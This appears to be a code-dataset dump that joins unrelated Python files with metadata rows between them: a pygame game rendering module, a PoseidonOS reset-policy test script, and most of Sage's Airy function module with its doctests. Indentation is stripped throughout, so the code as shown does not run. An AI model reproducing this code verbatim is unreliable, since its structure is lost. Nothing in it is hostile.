return newObject_list
SHIPSTATE = 1 #set in main, controls which of the durability stages of the ship prints (not always 1)
#the nuts and bolts of printing the things
def crayprinter(screen, xpos, ypos, object_number, rotation, decayLife, scalar3, graphlist, scalarscalar, flame, special):
colliderect = ""
if object_number == 0: #draws zvezda
image = Images.get(0)
screen.blit(image, (xpos, ypos))
elif object_number == 1 or object_number == 5: #draws main ship
image = rotatePixelArt(Images.get(1+SHIPSTATE/10), -rotation.getRotation())
screen.blit(image, (int(xpos-0.5*image.get_width()), int(ypos-0.5*image.get_height())))
colliderect = [int(xpos-0.5*image.get_width()), int(ypos-0.5*image.get_height()), image.get_width(),
image.get_height()]
if flame == True:
#flame_pointlist = [[50 + 6, 50 + 5], [50, 50 + 20], [50 - 6, 50 + 5]]
flame_pointlist = [[xpos, ypos], [xpos+6*scalar3, ypos+5*scalar3],
[xpos, ypos+20*scalar3],
[xpos-6*scalar3, ypos+5*scalar3]]
flame_pointlist = Rotate(xpos, ypos, flame_pointlist, rotation.getRotation())
flame_color = (255,100,0) if pgx.filehelper.get(3)[4] < 1 else (138, 43, 226)
pygame.gfxdraw.aapolygon(screen, flame_pointlist, flame_color)
pygame.gfxdraw.filled_polygon(screen, flame_pointlist, flame_color)
flame = False
elif object_number == 2 or object_number == 8: #draws missiles (id 8 are alien missiles)
pygame.draw.circle(screen, (255, 255, 255), (int(xpos), int(ypos)), 2, 0)
elif object_number == 4: #draws explosion effects
pygame.draw.circle(screen, (255, 255, 255), (int(xpos), int(ypos)), 1, 0)
elif object_number == 9: #draws alien blasts
scale = 1 + (.1 * (300 - decayLife))
image = scaleImage(Images.get(9), scale)
screen.blit(image, (int(xpos-0.5*image.get_width()), int(ypos-0.5*image.get_height())))
colliderect = Images.getHitbox(xpos, ypos, 9, rotation.getRotation())
Images.scaleHitbox(colliderect, scale)
elif object_number == 123:
image = Images.get(special.getFrameNum(), rotation.getRotation())
screen.blit(image, (int(xpos-0.5*image.get_width()), int(ypos-0.5*image.get_height())))
colliderect = Images.getHitbox(xpos, ypos, 123, rotation.getRotation())
else:
try:
if rotation.getRotating():
image = Images.get(object_number, rotation.getRotation())
else:
image = Images.get(object_number)
screen.blit(image, (int(xpos-0.5*image.get_width()), int(ypos-0.5*image.get_height())))
colliderect = Images.getHitbox(xpos, ypos, object_number, rotation.getRotation())
except:
pass
return colliderect
#takes care of the printing logic
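# object_list is a flat list holding 8 slots per object; the slots read here are:
# 0 = x position, 1 = y position, 4 = object type, 5 = rotation object,
# 6 = special, 7 = decayLife (slots 2-3 are not read in this module and are
# presumably velocity components managed elsewhere - an assumption).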
def printer(screen, object_list, scalar3, graphlist, scalarscalar, flame):
object_list = reorderObjectList(object_list)
#needed for testing which direction things are off the screen
width, height = screen.get_size()
left = pygame.Rect(-1,0,1,height)
right = pygame.Rect(width,0,1,height)
up = pygame.Rect(0,-1,width,1)
down = pygame.Rect(0,height,width,1)
for i in range(0, len(object_list), 8):
xpos = object_list[i]
ypos = object_list[i+1]
object_number = object_list[i+4] #object type
rotation = object_list[i+5] #rotation position
special = object_list[i+6]
decayLife = object_list[i+7]
colliderect = crayprinter(screen, xpos, ypos, object_number, rotation, decayLife, scalar3, graphlist, scalarscalar,
flame, special)
if colliderect:
if not screen.get_rect().contains(colliderect):
if left.colliderect(colliderect):
xpos += width
elif right.colliderect(colliderect):
xpos -= width
if up.colliderect(colliderect):
ypos += height
elif down.colliderect(colliderect):
ypos -= height
crayprinter(screen, xpos, ypos, object_number, rotation, decayLife, scalar3, graphlist, scalarscalar,
flame, special)
#flashing alerts for low fuel and armor
class FlashyBox:
def __init__(self, rect, threshold, color):
self.rect = rect
self.threshold = threshold
self.color = color
self.timer = -1
self.displaying = False
def update(self, screen, current):
if current < self.threshold:
self.timer += 1
elif current > self.threshold:
self.timer = -1
self.displaying = False
if self.timer != -1: #flips displaying when timer reaches 50
if self.timer == 50:
self.displaying = not self.displaying
self.timer = 0
if self.displaying: #draws the rectangle
pgx.draw.rect(screen, self.color, self.rect, 0)
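    # Net effect: once the tracked value falls below the threshold, the rectangle
    # toggles on and off every 50 update() calls until the value recovers.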
#controls the fuel, armor, and ammunition readout in bottom right
class InfoBars:
fuelalert = 1
armoralert = 1
def init(fuelalert, armoralert):
InfoBars.fuelalert = fuelalert
InfoBars.armoralert = armoralert
#prints out the fuel and armor bars
def draw(screen, currentfuel, totalfuel, currentarmor, totalarmor, ammunition, totalammunition):
fuelpic = Images.get("fuelpic")
armorpic = Images.get("armorpic")
shotpic = Images.get("shotpic")
#fuel
InfoBars.fuelalert.update(screen, currentfuel/totalfuel)
pgx.draw.sblit(screen, fuelpic, ("right-270", 1000))
pgx.draw.rect(screen, (178,34,34), ["right-220", 1000, 200, 50])
pgx.draw.rect(screen, (139,0,0), ["right-220", 1000, 200*currentfuel/totalfuel, 50])
#Texthelper.write(screen, [(1665, 1005), str(currentfuel), 3])
#armor
InfoBars.armoralert.update(screen, currentarmor/totalarmor)
pgx.draw.sblit(screen, armorpic, ("right-270", 930))
pgx.draw.rect(screen, (128,128,128), ["right-220", 930, 200, 50])
pgx.draw.rect(screen, (64,64,64), ["right-220", 930, 200*currentarmor/totalarmor, 50])
#Texthelper.write(screen, [(1665, 935), str(currentarmor), 3])
#ammunition
pgx.draw.sblit(screen, shotpic, ("right-270", 860))
Texthelper.write(screen, [("right-205", 865), str(ammunition) + "/" + str(totalammunition), 3])
#used by the map to actually draw out the sectors
def drawSector(screen, location, number, currentsector, cleared):
secsize = 80 #side length of the cubes
if number == currentsector:
color = (70, 130, 180)
elif cleared:
color = (20, 160, 40)
else:
color = (180, 50, 50)
pgx.draw.rect(screen, color, (location[0]-secsize/2, location[1]-secsize/2, secsize, secsize), 4)
if number == currentsector:
Texthelper.write(screen, [(location[0]-35, location[1]-35), "U R Here", 1], color=color)
Texthelper.write(screen, [(location[0]-len(str(number))*10, location[1]-15), str(number), 2], color=color)
#used in UIscreens and the main game loop to display the inventory
def drawInventory(screen, shipInventory):
Texthelper.write(screen, [("left+10",10), f"metal:{shipInventory[0]}", 3], color = (120,120,120))
Texthelper.write(screen, [("left+315",10), f"gas:{shipInventory[1]}", 3], color = (185,20,20))
Texthelper.write(screen, [("left+560",10), f"circuits:{shipInventory[2]}", 3], color = (20,185,20))
Texthelper.write(screen, [("left+965",10), f"credits:{shipInventory[3]}", 3], color = (230,180,20))
| 44.232558 | 132 | 0.637574 |
608741e2664030ef7eded0de736775fa79908a2c | 588 | py | Python | test/functional_requirements/devel/RESET_EVENT_WRR_POLICY_BASIC.py | so931/poseidonos | 2aa82f26bfbd0d0aee21cd0574779a655634f08c | [
"BSD-3-Clause"
] | 38 | 2021-04-06T03:20:55.000Z | 2022-03-02T09:33:28.000Z | test/functional_requirements/devel/RESET_EVENT_WRR_POLICY_BASIC.py | so931/poseidonos | 2aa82f26bfbd0d0aee21cd0574779a655634f08c | [
"BSD-3-Clause"
] | 19 | 2021-04-08T02:27:44.000Z | 2022-03-23T00:59:04.000Z | test/functional_requirements/devel/RESET_EVENT_WRR_POLICY_BASIC.py | so931/poseidonos | 2aa82f26bfbd0d0aee21cd0574779a655634f08c | [
"BSD-3-Clause"
] | 28 | 2021-04-08T04:39:18.000Z | 2022-03-24T05:56:00.000Z | #!/usr/bin/env python3
import subprocess
import os
import sys
sys.path.append("../")
sys.path.append("../../system/lib/")
sys.path.append("../system_overall/")
import json_parser
import pos
import cli
import api
import json
import START_POS_BASIC
def execute():
START_POS_BASIC.execute()
out = cli.reset_event_wrr_policy()
return out
if __name__ == "__main__":
if len(sys.argv) >= 2:
pos.set_addr(sys.argv[1])
api.clear_result(__file__)
out = execute()
ret = api.set_result_by_code_eq(out, 0, __file__)
pos.flush_and_kill_pos()
exit(ret)
| 18.375 | 53 | 0.688776 |
b4bffde38480b9dbb11547c19b96236422867543 | 30,150 | py | Python | src/sage/functions/airy.py | switzel/sage | 7eb8510dacf61b691664cd8f1d2e75e5d473e5a0 | [
"BSL-1.0"
] | null | null | null | src/sage/functions/airy.py | switzel/sage | 7eb8510dacf61b691664cd8f1d2e75e5d473e5a0 | [
"BSL-1.0"
] | null | null | null | src/sage/functions/airy.py | switzel/sage | 7eb8510dacf61b691664cd8f1d2e75e5d473e5a0 | [
"BSL-1.0"
] | 1 | 2020-07-24T12:20:37.000Z | 2020-07-24T12:20:37.000Z | r"""
Airy Functions
This module implements Airy functions and their generalized derivatives. It
supports symbolic functionality through Maxima and numeric evaluation through
mpmath and scipy.
Airy functions are solutions to the differential equation `f''(x) - x f(x) = 0`.
Four global function symbols are immediately available, please see
- :func:`airy_ai`: for the Airy Ai function
- :func:`airy_ai_prime()<FunctionAiryAiPrime>`: for the first derivative
of the Airy Ai function
- :func:`airy_bi`: for the Airy Bi function
- :func:`airy_bi_prime()<FunctionAiryBiPrime>`: for the first derivative
of the Airy Bi function
AUTHORS:
- Oscar Gerardo Lazo Arjona (2010): initial version
- Douglas McNeil (2012): rewrite
EXAMPLES:
Verify that the Airy functions are solutions to the differential equation::
sage: diff(airy_ai(x), x, 2) - x * airy_ai(x)
0
sage: diff(airy_bi(x), x, 2) - x * airy_bi(x)
0
"""
#*****************************************************************************
# Copyright (C) 2010 Oscar Gerardo Lazo Arjona <algebraicamente@gmail.com>
# Copyright (C) 2012 Douglas McNeil <dsm054@gmail.com>
#
# Distributed under the terms of the GNU General Public License (GPL)
# as published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.symbolic.function import BuiltinFunction
from sage.symbolic.expression import Expression
from sage.symbolic.ring import SR
from sage.structure.coerce import parent as sage_structure_coerce_parent
from sage.functions.other import gamma
from sage.rings.integer_ring import ZZ
from sage.rings.real_double import RDF
from sage.rings.rational import Rational as R
from sage.functions.special import meval
from sage.calculus.functional import derivative
class FunctionAiryAiGeneral(BuiltinFunction):
def __init__(self):
r"""
The generalized derivative of the Airy Ai function
INPUT:
- ``alpha`` -- Return the `\alpha`-th order fractional derivative with
respect to `z`.
For `\alpha = n = 1,2,3,\ldots` this gives the derivative
`\operatorname{Ai}^{(n)}(z)`, and for `\alpha = -n = -1,-2,-3,\ldots`
this gives the `n`-fold iterated integral.
.. math ::
f_0(z) = \operatorname{Ai}(z)
f_n(z) = \int_0^z f_{n-1}(t) dt
- ``x`` -- The argument of the function
EXAMPLES::
sage: from sage.functions.airy import airy_ai_general
sage: x, n = var('x n')
sage: airy_ai_general(-2, x)
airy_ai(-2, x)
sage: derivative(airy_ai_general(-2, x), x)
airy_ai(-1, x)
sage: airy_ai_general(n, x)
airy_ai(n, x)
sage: derivative(airy_ai_general(n, x), x)
airy_ai(n + 1, x)
"""
BuiltinFunction.__init__(self, "airy_ai", nargs=2,
latex_name=r"\operatorname{Ai}")
def _derivative_(self, alpha, x, diff_param=None):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_ai_general
sage: x, n = var('x n')
sage: derivative(airy_ai_general(n, x), x)
airy_ai(n + 1, x)
sage: derivative(airy_ai_general(n, x), n)
Traceback (most recent call last):
...
NotImplementedError: cannot differentiate airy_ai in the first parameter
"""
if diff_param == 0:
raise NotImplementedError("cannot differentiate airy_ai in the"
" first parameter")
return airy_ai_general(alpha + 1, x)
def _eval_(self, alpha, x):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_ai_general
sage: x, n = var('x n')
sage: airy_ai_general(-2, 1.0)
0.136645379421096
sage: airy_ai_general(n, 1.0)
airy_ai(n, 1.00000000000000)
"""
if not isinstance(x, Expression) and \
not isinstance(alpha, Expression):
if self._is_numerical(x):
return self._evalf_(alpha, x)
if alpha == 0:
return airy_ai_simple(x)
if alpha == 1:
return airy_ai_prime(x)
if alpha == 2:
return x*airy_ai_simple(x)
else:
return None
def _evalf_(self, alpha, x, parent=None, algorithm=None):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_ai_general
sage: airy_ai_general(-2, 1.0)
0.136645379421096
"""
import mpmath
from sage.libs.mpmath import utils as mpmath_utils
return mpmath_utils.call(mpmath.airyai, x, derivative=alpha,
parent=parent)
class FunctionAiryAiSimple(BuiltinFunction):
def __init__(self):
"""
The class for the Airy Ai function.
EXAMPLES::
sage: from sage.functions.airy import airy_ai_simple
sage: f = airy_ai_simple(x); f
airy_ai(x)
"""
BuiltinFunction.__init__(self, "airy_ai",
latex_name=r'\operatorname{Ai}',
conversions=dict(mathematica='AiryAi',
maxima='airy_ai'))
def _derivative_(self, x, diff_param=None):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_ai_simple
sage: derivative(airy_ai_simple(x), x)
airy_ai_prime(x)
"""
return airy_ai_prime(x)
def _eval_(self, x):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_ai_simple
sage: airy_ai_simple(0)
1/3*3^(1/3)/gamma(2/3)
sage: airy_ai_simple(0.0)
0.355028053887817
sage: airy_ai_simple(I)
airy_ai(I)
sage: airy_ai_simple(1.0 * I)
0.331493305432141 - 0.317449858968444*I
"""
if x == 0:
r = ZZ(2) / 3
return 1 / (3 ** (r) * gamma(r))
def _evalf_(self, x, **kwargs):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_ai_simple
sage: airy_ai_simple(0.0)
0.355028053887817
sage: airy_ai_simple(1.0 * I)
0.331493305432141 - 0.317449858968444*I
We can use several methods for numerical evaluation::
sage: airy_ai_simple(3).n(algorithm='mpmath')
0.00659113935746072
sage: airy_ai_simple(3).n(algorithm='mpmath', prec=100)
0.0065911393574607191442574484080
sage: airy_ai_simple(3).n(algorithm='scipy') # rel tol 1e-10
0.006591139357460719
sage: airy_ai_simple(I).n(algorithm='scipy') # rel tol 1e-10
0.33149330543214117 - 0.3174498589684438*I
TESTS::
sage: parent(airy_ai_simple(3).n(algorithm='scipy'))
Real Field with 53 bits of precision
sage: airy_ai_simple(3).n(algorithm='scipy', prec=200)
Traceback (most recent call last):
...
NotImplementedError: airy_ai not implemented for precision > 53
"""
algorithm = kwargs.get('algorithm', 'mpmath') or 'mpmath'
parent = kwargs.get('parent')
if algorithm == 'scipy':
if hasattr(parent, 'prec') and parent.prec() > 53:
raise NotImplementedError("%s not implemented for precision > 53"%self.name())
from sage.rings.all import RR, CC
from sage.functions.other import real,imag
from scipy.special import airy as airy
if x in RR:
y = airy(real(x))[0]
if parent is None:
return RR(y)
else:
y = airy(complex(real(x),imag(x)))[0]
if parent is None:
return CC(y)
return parent(y)
elif algorithm == 'mpmath':
import mpmath
from sage.libs.mpmath import utils as mpmath_utils
return mpmath_utils.call(mpmath.airyai, x, parent=parent)
else:
raise ValueError("unknown algorithm '%s'" % algorithm)
class FunctionAiryAiPrime(BuiltinFunction):
def __init__(self):
"""
The derivative of the Airy Ai function; see :func:`airy_ai`
for the full documentation.
EXAMPLES::
sage: x, n = var('x n')
sage: airy_ai_prime(x)
airy_ai_prime(x)
sage: airy_ai_prime(0)
-1/3*3^(2/3)/gamma(1/3)
"""
BuiltinFunction.__init__(self, "airy_ai_prime",
latex_name=r"\operatorname{Ai}'",
conversions=dict(mathematica='AiryAiPrime',
maxima='airy_dai'))
def _derivative_(self, x, diff_param=None):
"""
EXAMPLES::
sage: derivative(airy_ai_prime(x), x)
x*airy_ai(x)
"""
return x * airy_ai_simple(x)
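    # Editor's note: the identity above follows from the Airy differential
    # equation f''(x) = x*f(x), so d/dx Ai'(x) = Ai''(x) = x*Ai(x).  This is
    # also why the generalized classes map alpha == 2 to x*airy_ai_simple(x).
    # Illustrative sketch of the check in a Sage session (assuming the
    # default hold behaviour):
    #
    #     sage: x = var('x')
    #     sage: derivative(airy_ai_simple(x), x, 2) - x*airy_ai_simple(x)
    #     0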
def _eval_(self, x):
"""
EXAMPLES::
sage: airy_ai_prime(0)
-1/3*3^(2/3)/gamma(1/3)
sage: airy_ai_prime(0.0)
-0.258819403792807
"""
if x == 0:
r = ZZ(1) / 3
return -1 / (3 ** (r) * gamma(r))
def _evalf_(self, x, **kwargs):
"""
EXAMPLES::
sage: airy_ai_prime(0.0)
-0.258819403792807
We can use several methods for numerical evaluation::
sage: airy_ai_prime(4).n(algorithm='mpmath')
-0.00195864095020418
sage: airy_ai_prime(4).n(algorithm='mpmath', prec=100)
-0.0019586409502041789001381409184
sage: airy_ai_prime(4).n(algorithm='scipy') # rel tol 1e-10
-0.00195864095020418
sage: airy_ai_prime(I).n(algorithm='scipy') # rel tol 1e-10
-0.43249265984180707 + 0.09804785622924324*I
TESTS::
sage: parent(airy_ai_prime(3).n(algorithm='scipy'))
Real Field with 53 bits of precision
sage: airy_ai_prime(3).n(algorithm='scipy', prec=200)
Traceback (most recent call last):
...
NotImplementedError: airy_ai_prime not implemented for precision > 53
"""
algorithm = kwargs.get('algorithm', 'mpmath') or 'mpmath'
parent = kwargs.get('parent', None)
if algorithm == 'scipy':
if hasattr(parent, 'prec') and parent.prec() > 53:
raise NotImplementedError("%s not implemented for precision > 53"%self.name())
from sage.rings.all import RR, CC
from sage.functions.other import real,imag
from scipy.special import airy as airy
if x in RR:
y = airy(real(x))[1]
if parent is None:
return RR(y)
else:
y = airy(complex(real(x),imag(x)))[1]
if parent is None:
return CC(y)
return parent(y)
elif algorithm == 'mpmath':
import mpmath
from sage.libs.mpmath import utils as mpmath_utils
return mpmath_utils.call(mpmath.airyai, x, derivative=1,
parent=parent)
else:
raise ValueError("unknown algorithm '%s'" % algorithm)
airy_ai_general = FunctionAiryAiGeneral()
airy_ai_simple = FunctionAiryAiSimple()
airy_ai_prime = FunctionAiryAiPrime()
def airy_ai(alpha, x=None, hold_derivative=True, **kwds):
r"""
The Airy Ai function
The Airy Ai function `\operatorname{Ai}(x)` is (along with
`\operatorname{Bi}(x)`) one of the two linearly independent standard
solutions to the Airy differential equation `f''(x) - x f(x) = 0`. It is
defined by the initial conditions:
.. math ::
        \operatorname{Ai}(0)=\frac{1}{3^{2/3} \Gamma\left(\frac{2}{3}\right)},
        \operatorname{Ai}'(0)=-\frac{1}{3^{1/3}\Gamma\left(\frac{1}{3}\right)}.
Another way to define the Airy Ai function is:
.. math::
\operatorname{Ai}(x)=\frac{1}{\pi}\int_0^\infty
\cos\left(\frac{1}{3}t^3+xt\right) dt.
INPUT:
- ``alpha`` -- Return the `\alpha`-th order fractional derivative with
respect to `z`.
For `\alpha = n = 1,2,3,\ldots` this gives the derivative
`\operatorname{Ai}^{(n)}(z)`, and for `\alpha = -n = -1,-2,-3,\ldots`
this gives the `n`-fold iterated integral.
.. math ::
f_0(z) = \operatorname{Ai}(z)
f_n(z) = \int_0^z f_{n-1}(t) dt
- ``x`` -- The argument of the function
- ``hold_derivative`` -- Whether or not to stop from returning higher
derivatives in terms of `\operatorname{Ai}(x)` and
`\operatorname{Ai}'(x)`
.. SEEALSO:: :func:`airy_bi`
EXAMPLES::
sage: n, x = var('n x')
sage: airy_ai(x)
airy_ai(x)
It can return derivatives or integrals::
sage: airy_ai(2, x)
airy_ai(2, x)
sage: airy_ai(1, x, hold_derivative=False)
airy_ai_prime(x)
sage: airy_ai(2, x, hold_derivative=False)
x*airy_ai(x)
sage: airy_ai(-2, x, hold_derivative=False)
airy_ai(-2, x)
sage: airy_ai(n, x)
airy_ai(n, x)
It can be evaluated symbolically or numerically for real or complex
values::
sage: airy_ai(0)
1/3*3^(1/3)/gamma(2/3)
sage: airy_ai(0.0)
0.355028053887817
sage: airy_ai(I)
airy_ai(I)
sage: airy_ai(1.0*I)
0.331493305432141 - 0.317449858968444*I
    The functions can be evaluated numerically using either mpmath, which
    can compute the values to arbitrary precision, or scipy::
sage: airy_ai(2).n(prec=100)
0.034924130423274379135322080792
sage: airy_ai(2).n(algorithm='mpmath', prec=100)
0.034924130423274379135322080792
sage: airy_ai(2).n(algorithm='scipy') # rel tol 1e-10
0.03492413042327323
And the derivatives can be evaluated::
sage: airy_ai(1, 0)
-1/3*3^(2/3)/gamma(1/3)
sage: airy_ai(1, 0.0)
-0.258819403792807
Plots::
sage: plot(airy_ai(x), (x, -10, 5)) + plot(airy_ai_prime(x),
....: (x, -10, 5), color='red')
Graphics object consisting of 2 graphics primitives
**References**
- Abramowitz, Milton; Stegun, Irene A., eds. (1965), "Chapter 10"
- :wikipedia:`Airy_function`
"""
# We catch the case with no alpha
if x is None:
x = alpha
return airy_ai_simple(x, **kwds)
# We take care of all other cases.
if not alpha in ZZ and not isinstance(alpha, Expression):
return airy_ai_general(alpha, x, **kwds)
if hold_derivative:
return airy_ai_general(alpha, x, **kwds)
elif alpha == 0:
return airy_ai_simple(x, **kwds)
elif alpha == 1:
return airy_ai_prime(x, **kwds)
elif alpha > 1:
# We use a different variable here because if x is a
# particular value, we would be differentiating a constant
# which would return 0. What we want is the value of
# the derivative at the value and not the derivative of
# a particular value of the function.
v = SR.symbol()
return derivative(airy_ai_simple(v, **kwds), v, alpha).subs({v: x})
else:
return airy_ai_general(alpha, x, **kwds)
########################################################################
########################################################################
class FunctionAiryBiGeneral(BuiltinFunction):
def __init__(self):
r"""
The generalized derivative of the Airy Bi function.
INPUT:
- ``alpha`` -- Return the `\alpha`-th order fractional derivative with
respect to `z`.
For `\alpha = n = 1,2,3,\ldots` this gives the derivative
`\operatorname{Bi}^{(n)}(z)`, and for `\alpha = -n = -1,-2,-3,\ldots`
this gives the `n`-fold iterated integral.
.. math ::
f_0(z) = \operatorname{Bi}(z)
f_n(z) = \int_0^z f_{n-1}(t) dt
- ``x`` -- The argument of the function
EXAMPLES::
sage: from sage.functions.airy import airy_bi_general
sage: x, n = var('x n')
sage: airy_bi_general(-2, x)
airy_bi(-2, x)
sage: derivative(airy_bi_general(-2, x), x)
airy_bi(-1, x)
sage: airy_bi_general(n, x)
airy_bi(n, x)
sage: derivative(airy_bi_general(n, x), x)
airy_bi(n + 1, x)
"""
BuiltinFunction.__init__(self, "airy_bi", nargs=2,
latex_name=r"\operatorname{Bi}")
def _derivative_(self, alpha, x, diff_param=None):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_bi_general
sage: x, n = var('x n')
sage: derivative(airy_bi_general(n, x), x)
airy_bi(n + 1, x)
sage: derivative(airy_bi_general(n, x), n)
Traceback (most recent call last):
...
NotImplementedError: cannot differentiate airy_bi in the first parameter
"""
if diff_param == 0:
raise NotImplementedError("cannot differentiate airy_bi in the"
" first parameter")
return airy_bi_general(alpha + 1, x)
def _eval_(self, alpha, x):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_bi_general
sage: x, n = var('x n')
sage: airy_bi_general(-2, 1.0)
0.388621540699059
sage: airy_bi_general(n, 1.0)
airy_bi(n, 1.00000000000000)
"""
if not isinstance(x, Expression) and \
not isinstance(alpha, Expression):
if alpha == 0:
return airy_bi_simple(x)
if alpha == 1:
return airy_bi_prime(x)
if alpha == 2:
return x*airy_bi_simple(x)
def _evalf_(self, alpha, x, **kwargs):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_bi_general
sage: airy_bi_general(-2, 1.0)
0.388621540699059
"""
parent = kwargs.get('parent')
import mpmath
from sage.libs.mpmath import utils as mpmath_utils
return mpmath_utils.call(mpmath.airybi, x, derivative=alpha,
parent=parent)
class FunctionAiryBiSimple(BuiltinFunction):
def __init__(self):
"""
The class for the Airy Bi function.
EXAMPLES::
sage: from sage.functions.airy import airy_bi_simple
sage: f = airy_bi_simple(x); f
airy_bi(x)
"""
BuiltinFunction.__init__(self, "airy_bi",
latex_name=r'\operatorname{Bi}',
conversions=dict(mathematica='AiryBi',
maxima='airy_bi'))
def _derivative_(self, x, diff_param=None):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_bi_simple
sage: derivative(airy_bi_simple(x), x)
airy_bi_prime(x)
"""
return airy_bi_prime(x)
def _eval_(self, x):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_bi_simple
sage: airy_bi_simple(0)
1/3*3^(5/6)/gamma(2/3)
sage: airy_bi_simple(0.0)
0.614926627446001
sage: airy_bi_simple(0).n() == airy_bi(0.0)
True
sage: airy_bi_simple(I)
airy_bi(I)
sage: airy_bi_simple(1.0 * I)
0.648858208330395 + 0.344958634768048*I
"""
if x == 0:
one_sixth = ZZ(1) / 6
return 1 / (3 ** (one_sixth) * gamma(4 * one_sixth))
def _evalf_(self, x, **kwargs):
"""
EXAMPLES::
sage: from sage.functions.airy import airy_bi_simple
sage: airy_bi_simple(0.0)
0.614926627446001
sage: airy_bi_simple(1.0 * I)
0.648858208330395 + 0.344958634768048*I
We can use several methods for numerical evaluation::
sage: airy_bi_simple(3).n(algorithm='mpmath')
14.0373289637302
sage: airy_bi_simple(3).n(algorithm='mpmath', prec=100)
14.037328963730232031740267314
sage: airy_bi_simple(3).n(algorithm='scipy') # rel tol 1e-10
14.037328963730136
sage: airy_bi_simple(I).n(algorithm='scipy') # rel tol 1e-10
0.648858208330395 + 0.34495863476804844*I
TESTS::
sage: parent(airy_bi_simple(3).n(algorithm='scipy'))
Real Field with 53 bits of precision
sage: airy_bi_simple(3).n(algorithm='scipy', prec=200)
Traceback (most recent call last):
...
NotImplementedError: airy_bi not implemented for precision > 53
"""
algorithm = kwargs.get('algorithm', 'mpmath') or 'mpmath'
parent = kwargs.get('parent', None)
if algorithm == 'scipy':
if hasattr(parent, 'prec') and parent.prec() > 53:
raise NotImplementedError("%s not implemented for precision > 53"%self.name())
from sage.rings.all import RR, CC
from sage.functions.other import real,imag
from scipy.special import airy as airy
if x in RR:
y = airy(real(x))[2]
if parent is None:
return RR(y)
else:
y = airy(complex(real(x),imag(x)))[2]
if parent is None:
return CC(y)
return parent(y)
elif algorithm == 'mpmath':
import mpmath
from sage.libs.mpmath import utils as mpmath_utils
return mpmath_utils.call(mpmath.airybi, x, parent=parent)
else:
raise ValueError("unknown algorithm '%s'" % algorithm)
class FunctionAiryBiPrime(BuiltinFunction):
def __init__(self):
"""
The derivative of the Airy Bi function; see :func:`airy_bi`
for the full documentation.
EXAMPLES::
sage: x, n = var('x n')
sage: airy_bi_prime(x)
airy_bi_prime(x)
sage: airy_bi_prime(0)
3^(1/6)/gamma(1/3)
"""
BuiltinFunction.__init__(self, "airy_bi_prime",
latex_name=r"\operatorname{Bi}'",
conversions=dict(mathematica='AiryBiPrime',
maxima='airy_dbi'))
def _derivative_(self, x, diff_param=None):
"""
EXAMPLES::
sage: derivative(airy_bi_prime(x), x)
x*airy_bi(x)
"""
return x * airy_bi_simple(x)
def _eval_(self, x):
"""
EXAMPLES::
sage: airy_bi_prime(0)
3^(1/6)/gamma(1/3)
sage: airy_bi_prime(0.0)
0.448288357353826
"""
if x == 0:
one_sixth = ZZ(1) / 6
return 3 ** (one_sixth) / gamma(2 * one_sixth)
def _evalf_(self, x, **kwargs):
"""
EXAMPLES::
sage: airy_bi_prime(0.0)
0.448288357353826
We can use several methods for numerical evaluation::
sage: airy_bi_prime(4).n(algorithm='mpmath')
161.926683504613
sage: airy_bi_prime(4).n(algorithm='mpmath', prec=100)
161.92668350461340184309492429
sage: airy_bi_prime(4).n(algorithm='scipy') # rel tol 1e-10
161.92668350461398
sage: airy_bi_prime(I).n(algorithm='scipy') # rel tol 1e-10
0.135026646710819 - 0.1288373867812549*I
TESTS::
sage: parent(airy_bi_prime(3).n(algorithm='scipy'))
Real Field with 53 bits of precision
sage: airy_bi_prime(3).n(algorithm='scipy', prec=200)
Traceback (most recent call last):
...
NotImplementedError: airy_bi_prime not implemented for precision > 53
"""
algorithm = kwargs.get('algorithm', 'mpmath') or 'mpmath'
parent = kwargs.get('parent', None)
if algorithm == 'scipy':
if hasattr(parent, 'prec') and parent.prec() > 53:
raise NotImplementedError("%s not implemented for precision > 53"%self.name())
from sage.rings.all import RR, CC
from sage.functions.other import real,imag
from scipy.special import airy as airy
if x in RR:
y = airy(real(x))[3]
if parent is None:
return RR(y)
else:
y = airy(complex(real(x),imag(x)))[3]
if parent is None:
return CC(y)
return parent(y)
elif algorithm == 'mpmath':
import mpmath
from sage.libs.mpmath import utils as mpmath_utils
return mpmath_utils.call(mpmath.airybi, x, derivative=1,
parent=parent)
else:
raise ValueError("unknown algorithm '%s'" % algorithm)
airy_bi_general = FunctionAiryBiGeneral()
airy_bi_simple = FunctionAiryBiSimple()
airy_bi_prime = FunctionAiryBiPrime()
def airy_bi(alpha, x=None, hold_derivative=True, **kwds):
r"""
The Airy Bi function
The Airy Bi function `\operatorname{Bi}(x)` is (along with
`\operatorname{Ai}(x)`) one of the two linearly independent standard
solutions to the Airy differential equation `f''(x) - x f(x) = 0`. It is
defined by the initial conditions:
.. math ::
\operatorname{Bi}(0)=\frac{1}{3^{1/6} \Gamma\left(\frac{2}{3}\right)},
\operatorname{Bi}'(0)=\frac{3^{1/6}}{ \Gamma\left(\frac{1}{3}\right)}.
Another way to define the Airy Bi function is:
.. math::
\operatorname{Bi}(x)=\frac{1}{\pi}\int_0^\infty
\left[ \exp\left( xt -\frac{t^3}{3} \right)
+\sin\left(xt + \frac{1}{3}t^3\right) \right ] dt.
INPUT:
- ``alpha`` -- Return the `\alpha`-th order fractional derivative with
respect to `z`.
For `\alpha = n = 1,2,3,\ldots` this gives the derivative
`\operatorname{Bi}^{(n)}(z)`, and for `\alpha = -n = -1,-2,-3,\ldots`
this gives the `n`-fold iterated integral.
.. math ::
f_0(z) = \operatorname{Bi}(z)
f_n(z) = \int_0^z f_{n-1}(t) dt
- ``x`` -- The argument of the function
- ``hold_derivative`` -- Whether or not to stop from returning higher
derivatives in terms of `\operatorname{Bi}(x)` and
`\operatorname{Bi}'(x)`
.. SEEALSO:: :func:`airy_ai`
EXAMPLES::
sage: n, x = var('n x')
sage: airy_bi(x)
airy_bi(x)
It can return derivatives or integrals::
sage: airy_bi(2, x)
airy_bi(2, x)
sage: airy_bi(1, x, hold_derivative=False)
airy_bi_prime(x)
sage: airy_bi(2, x, hold_derivative=False)
